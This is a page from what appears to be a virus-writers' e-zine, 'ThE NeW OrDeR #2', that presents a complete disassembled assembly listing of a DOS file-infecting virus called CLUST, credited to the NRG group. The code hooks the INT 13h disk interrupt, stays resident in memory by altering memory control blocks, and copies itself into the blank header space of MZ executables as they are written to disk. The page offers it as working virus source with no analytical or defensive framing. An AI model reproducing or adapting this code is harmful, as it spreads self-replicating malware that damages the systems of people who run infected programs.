<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>CLUST</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.code<br>
org 100h<br>
<br>
start:<br>
jmp short EntryPoint<br>
<br>
LotsaNOPs db 122 dup (90h)<br>
OldInt13 dd 0<br>
<br>
EntryPoint:<br>
db 0e9h,7ch,0<br>
<br>
Int13Handler:<br>
cmp ah,3<br>
je IsDiskWrite<br>
<br>
cmp ah,2<br>
jne GoInt13<br>
<br>
pushf<br>
call cs:OldInt13<br>
<br>
jc Exit13Handler<br>
<br>
cmp word ptr es:[bx],7EEBh<br>
jne Exit13Handler<br>
<br>
mov word ptr es:[bx],5A4Dh<br>
<br>
push di cx ax<br>
mov cx,115h<br>
xor ax,ax<br>
db 89h,0dfh<br>
<br>
add di,80h<br>
rep stosb<br>
pop ax cx di<br>
<br>
Exit13Handler:<br>
iret<br>
GoInt13:<br>
jmp cs:[OldInt13]<br>
IsDiskWrite:<br>
cmp word ptr es:[bx],5A4Dh<br>
jne GoInt13<br>
<br>
cmp word ptr es:[bx+4],75h<br>
jae GoInt13<br>
<br>
push ax cx si di ds<br>
push es<br>
pop ds<br>
db 89h,0deh<br>
<br>
add si,80h<br>
mov cx,115h<br>
AllZeros:<br>
lodsb<br>
cmp al,0<br>
loopz AllZeros<br>
<br>
cmp cx,0<br>
jne ExitInfectHandler<br>
<br>
<br>
db 89h,0dfh<br>
add di,80h<br>
mov cx,115h<br>
mov si,offset OldInt13<br>
push cs<br>
pop ds<br>
rep movsb<br>
<br>
db 89h,0dfh<br>
<br>
mov ax,7EEBh<br>
stosw<br>
<br>
ExitInfectHandler:<br>
pop ds di si cx ax<br>
jmp short GoInt13<br>
<br>
InstallVirus:<br>
mov ax,3513h<br>
int 21h<br>
mov word ptr cs:[OldInt13],bx<br>
mov word ptr cs:[OldInt13+2],es<br>
<br>
mov ah,0Dh<br>
int 21h<br>
<br>
mov ah,36h<br>
mov dl,0<br>
int 21h<br>
<br>
mov ax,cs<br>
dec ax<br>
mov ds,ax<br>
cmp byte ptr ds:0,'Z'<br>
jne Terminate<br>
<br>
;sub word ptr ds:[3],39h<br>
db 81h,2eh,03,0,39h,0<br>
<br>
;sub word ptr ds:[12h],39h<br>
db 81h,2eh,12h,0,39h,0<br>
<br>
mov si,offset OldInt13<br>
<br>
db 89h,0f7h<br>
<br>
mov es,ds:[12h] ;ES = new segment<br>
push cs<br>
pop ds<br>
mov cx,115h<br>
rep movsb<br>
<br>
mov ax,2513h<br>
push es<br>
pop ds<br>
mov dx,offset Int13Handler<br>
int 21h<br>
<br>
mov ah,4Ah<br>
push cs<br>
pop es<br>
mov bx,39h<br>
int 21h<br>
<br>
push cs<br>
pop ds<br>
mov bx,ds:[2ch]<br>
mov es,bx<br>
xor ax,ax<br>
mov di,1<br>
<br>
ScanForFilename:<br>
dec di<br>
scasw<br>
jnz ScanForFilename<br>
<br>
lea si,[di+2]<br>
push bx<br>
pop ds<br>
push cs<br>
pop es<br>
<br>
mov di,offset Filename<br>
push di<br>
xor bx,bx<br>
<br>
CopyFilename:<br>
mov cx,50h<br>
inc bx<br>
lodsb<br>
cmp al,0<br>
jne StoreFilename<br>
mov al,0Dh<br>
<br>
StoreFilename:<br>
stosb<br>
cmp al,0Dh<br>
loopnz CopyFilename<br>
mov byte ptr ds:[28fh],bl<br>
push cs<br>
pop ds<br>
pop si<br>
dec si<br>
int 2Eh<br>
</strong></font><font color="#FFFFFF"><strong><br>
Terminate:<br>
mov ah,4Ch<br>
int 21h<br>
<br>
db 0<br>
Filename db 1<br>
<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
